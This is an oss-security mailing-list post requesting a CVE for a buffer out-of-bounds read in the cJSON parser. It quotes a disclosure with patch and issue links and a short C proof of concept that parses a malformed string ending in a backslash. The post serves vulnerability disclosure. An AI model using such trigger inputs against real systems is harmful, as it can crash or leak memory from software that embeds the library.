oss-security - CVE request: cJSON buffer out of bound read

Follow @Openwall on Twitter for new release announcements and other news

[<prev] [next>] [<thread-prev] [day] [month] [year] [list]

Message-ID: <20161107084646.GA16344@tunkki>
Date: Mon, 7 Nov 2016 10:46:46 +0200
From: Henri Salo <henri@...v.fi>
To: cve-assign@...re.org
Cc: oss-security@...ts.openwall.com
Subject: CVE request: cJSON buffer out of bound read

On Sun, Oct 02, 2016 at 08:06:25PM +0800, Marco Grassi wrote:
> I would like to report a buffer out of bound read problem in cJSON, which
> is a embeddable JSON parser, used (I imagine) in embedded devices, or even
> bigger stuff like the ps4 (
> http://doc.dl.playstation.net/doc/ps4-oss/cjson.html).
> 
> patch:
> https://github.com/DaveGamble/cJSON/commit/94df772485c92866ca417d92137747b2e3b0a917
> 
> issue:
> https://github.com/DaveGamble/cJSON/issues/30
> 
> Poc with the malformed string
> 
> #include <stdio.h>
> #include <stdint.h>
> #include <fcntl.h>
> #include "cJSON.h"
> 
> static const char *my_json = "\"000000000000000000\\";
> 
> int main(int argc, const char * argv[]) {
>     cJSON * root = cJSON_Parse(my_json);
>     char * rendered = cJSON_Print(root);
>     printf("%s\n", rendered);
>     return 0;
> }

MITRE can you assign a CVE identifier for this vulnerability, thank you?

-- 
Henri Salo

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.